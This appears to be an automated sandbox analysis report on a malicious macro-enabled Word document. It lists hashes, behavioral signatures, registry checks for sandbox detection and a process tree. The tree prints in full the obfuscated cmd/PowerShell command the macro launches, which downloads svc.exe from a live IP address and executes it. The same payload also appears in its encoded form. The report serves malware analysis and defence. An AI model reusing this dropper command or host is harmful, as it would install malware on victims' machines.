Analysis
-
max time kernel
135s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
24-05-2024 01:21
Behavioral task
behavioral1
Sample
616476ce3c35d67b5edbb73b6c8965d5894f404f90074add16986f8d5c81d6f0.docm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
616476ce3c35d67b5edbb73b6c8965d5894f404f90074add16986f8d5c81d6f0.docm
Resource
win10v2004-20240508-en
General
-
Target
616476ce3c35d67b5edbb73b6c8965d5894f404f90074add16986f8d5c81d6f0.docm
-
Size
518KB
-
MD5
1f2d795ca29afadf24325cfbb3f60e4e
-
SHA1
d5e05bf7300a09b6706082907e726b0d5a09e550
-
SHA256
616476ce3c35d67b5edbb73b6c8965d5894f404f90074add16986f8d5c81d6f0
-
SHA512
40ff395e3e62e9c0b47d9ec088129042b26ceeee28c76c23615086c33fcbc57250a8c4ea53464dfd5398a5e023743dca988d7c86ec1f6039a873d8b3352393b7
-
SSDEEP
6144:sEc+F+HLHNIvPl8qZDC9VT8L38S8WyI6OLxoq5seCsH8BB3y8dqtUO2TsyUrOSo:sEcJHNopZW9eLH8WyITLfyXXvqxj9o
Malware Config
Extracted
http://94.232.249.161/download/svc.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3420 1384 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 28 5088 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
svc.exepid process 5008 svc.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4160 5008 WerFault.exe svc.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI svc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI svc.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI svc.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 840 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1384 WINWORD.EXE 1384 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 3680 powershell.exe 3680 powershell.exe 3680 powershell.exe 5088 powershell.exe 5088 powershell.exe 5088 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3680 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 1384 WINWORD.EXE 1384 WINWORD.EXE 1384 WINWORD.EXE 1384 WINWORD.EXE 1384 WINWORD.EXE 1384 WINWORD.EXE 1384 WINWORD.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
WINWORD.EXEcmd.exepowershell.exepowershell.exedescription pid process target process PID 1384 wrote to memory of 3420 1384 WINWORD.EXE cmd.exe PID 1384 wrote to memory of 3420 1384 WINWORD.EXE cmd.exe PID 3420 wrote to memory of 840 3420 cmd.exe timeout.exe PID 3420 wrote to memory of 840 3420 cmd.exe timeout.exe PID 3420 wrote to memory of 3680 3420 cmd.exe powershell.exe PID 3420 wrote to memory of 3680 3420 cmd.exe powershell.exe PID 3680 wrote to memory of 5088 3680 powershell.exe powershell.exe PID 3680 wrote to memory of 5088 3680 powershell.exe powershell.exe PID 5088 wrote to memory of 5008 5088 powershell.exe svc.exe PID 5088 wrote to memory of 5008 5088 powershell.exe svc.exe PID 5088 wrote to memory of 5008 5088 powershell.exe svc.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\616476ce3c35d67b5edbb73b6c8965d5894f404f90074add16986f8d5c81d6f0.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\SYSTEM32\cmd.execmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzk0LjIzMi4yNDkuMTYxL2Rvd25sb2FkL3N2Yy5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmMuZXhlIjsgJFdlYi5Eb3dubG9hZEZpbGUoJFVybCwgJFB0aCk7IEludm9rZS1FeHByZXNzaW9uICRQdGg7')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3420 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzk0LjIzMi4yNDkuMTYxL2Rvd25sb2FkL3N2Yy5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmMuZXhlIjsgJFdlYi5Eb3dubG9hZEZpbGUoJFVybCwgJFB0aCk7IEludm9rZS1FeHByZXNzaW9uICRQdGg7')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA5ADQALgAyADMAMgAuADIANAA5AC4AMQA2ADEALwBkAG8AdwBuAGwAbwBhAGQALwBzAHYAYwAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAC4AZQB4AGUAIgA7ACAAJABXAGUAYgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABVAHIAbAAsACAAJABQAHQAaAApADsAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAFAAdABoADsA4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Users\Admin\AppData\Local\Temp\svc.exe"C:\Users\Admin\AppData\Local\Temp\svc.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:5008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 3526⤵
- Program crash
PID:4160
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5008 -ip 50081⤵PID:1832
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4176,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:81⤵PID:4104
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
180KB
MD592c57dd80b764a028749520017d44e76
SHA1f732220adaacf23de6cc69d964341766d2e350d9
SHA256dbd741a45d840d06d708339f9e9824f2a0d745ea6537ca44bff233ba7441bfda
SHA512dd7d363fef5750a256abc2ae43d17f8e4788d392afaa74a2085f34da05efeb12373f38fbf480e1c86eb2759c667c971c7c54512f5d59ee61f5a0a4341ac406c8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl
Filesize262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810